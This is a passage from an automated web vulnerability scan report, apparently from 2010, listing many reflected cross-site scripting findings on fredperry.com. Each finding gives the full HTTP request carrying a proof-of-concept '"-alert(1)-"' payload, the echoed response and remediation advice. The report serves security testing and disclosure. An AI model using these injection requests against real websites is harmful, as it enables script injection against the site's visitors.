HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:21:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=s5epv4r4i2sttp44o9n4suh513; expires=Tue, 09-Nov-2010 17:21:05 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29369
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/accessoriese6a85"-alert(1)-"300d6ce8743/"); //]]> ...[SNIP]...
1.149. http://www.fredperry.com/limited-edition/women/accessories/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/accessories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31709"-alert(1)-"d269657da44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/accessories/?31709"-alert(1)-"d269657da44=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/accessories/?31709"-alert(1)-"d269657da44=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a422"-alert(1)-"8f681c0c66b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition1a422"-alert(1)-"8f681c0c66b/women/bags/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:58 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ta15vgogrnorgonqfudmjnrj76; expires=Tue, 09-Nov-2010 17:14:58 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition1a422"-alert(1)-"8f681c0c66b/women/bags/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b43"-alert(1)-"406580c4491 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/womena6b43"-alert(1)-"406580c4491/bags/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=sdbh97r4md7k7ln26gr9jls147; expires=Tue, 09-Nov-2010 17:15:32 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/womena6b43"-alert(1)-"406580c4491/bags/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dba45"-alert(1)-"8611336e635 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/bagsdba45"-alert(1)-"8611336e635/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:56 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=79culemoq5vvafjn57qrqbp0k5; expires=Tue, 09-Nov-2010 17:15:56 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/bagsdba45"-alert(1)-"8611336e635/"); //]]> ...[SNIP]...
1.153. http://www.fredperry.com/limited-edition/women/bags/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/bags/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a888"-alert(1)-"e9449111db7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/bags/?1a888"-alert(1)-"e9449111db7=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/bags/?1a888"-alert(1)-"e9449111db7=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cc77"-alert(1)-"8df6d5753ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition9cc77"-alert(1)-"8df6d5753ab/women/blank-canvas-ann-sofie-back/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:13 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=9c63vhna60h3f9d7p0flptleo4; expires=Tue, 09-Nov-2010 17:15:13 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29385
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition9cc77"-alert(1)-"8df6d5753ab/women/blank-canvas-ann-sofie-back/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb8ab"-alert(1)-"d3b4f2c0bac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/womenfb8ab"-alert(1)-"d3b4f2c0bac/blank-canvas-ann-sofie-back/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:39 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=qjpnguf6q36k2ksu35vp7htro0; expires=Tue, 09-Nov-2010 17:15:39 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29385
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/womenfb8ab"-alert(1)-"d3b4f2c0bac/blank-canvas-ann-sofie-back/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36cd8"-alert(1)-"8e2713d7551 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/blank-canvas-ann-sofie-back36cd8"-alert(1)-"8e2713d7551/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:16:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=5qbk7rak06nsao4tonccqlbgd3; expires=Tue, 09-Nov-2010 17:16:01 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29385
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/blank-canvas-ann-sofie-back36cd8"-alert(1)-"8e2713d7551/"); //]]> ...[SNIP]...
1.157. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d28b"-alert(1)-"4759f050573 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/blank-canvas-ann-sofie-back/?4d28b"-alert(1)-"4759f050573=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138a5"-alert(1)-"4cb6177581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition138a5"-alert(1)-"4cb6177581/women/collaboration/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=qva44de22rhlahod84sf5ghjp5; expires=Tue, 09-Nov-2010 17:14:20 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition138a5"-alert(1)-"4cb6177581/women/collaboration/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4b2d"-alert(1)-"4d7360fd3ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/womena4b2d"-alert(1)-"4d7360fd3ec/collaboration/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=itp8cta29gippdg6e6uvtl3bp4; expires=Tue, 09-Nov-2010 17:14:41 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/womena4b2d"-alert(1)-"4d7360fd3ec/collaboration/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f83df"-alert(1)-"13320d1bbae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/collaborationf83df"-alert(1)-"13320d1bbae/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=j3khbiefp69vcvsjqi8s941rl2; expires=Tue, 09-Nov-2010 17:15:02 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/collaborationf83df"-alert(1)-"13320d1bbae/"); //]]> ...[SNIP]...
1.161. http://www.fredperry.com/limited-edition/women/collaboration/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/collaboration/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6261"-alert(1)-"b4c4364b0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/collaboration/?e6261"-alert(1)-"b4c4364b0e=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:47 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=irnsq15v08g7ekuep3cnvd35d0; expires=Tue, 09-Nov-2010 17:13:47 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29373
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/collaboration/?e6261"-alert(1)-"b4c4364b0e=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73620"-alert(1)-"1ba7f11b9ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition73620"-alert(1)-"1ba7f11b9ac/women/dresses/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:09 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=e8intv2rp1hb9gkg85kl8uqgk0; expires=Tue, 09-Nov-2010 17:20:09 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29365
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition73620"-alert(1)-"1ba7f11b9ac/women/dresses/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83d54"-alert(1)-"bb802bcf9bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women83d54"-alert(1)-"bb802bcf9bd/dresses/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=4a96726nvsami438drr4261mh2; expires=Tue, 09-Nov-2010 17:20:32 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29365
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women83d54"-alert(1)-"bb802bcf9bd/dresses/"); //]]> ...[SNIP]...
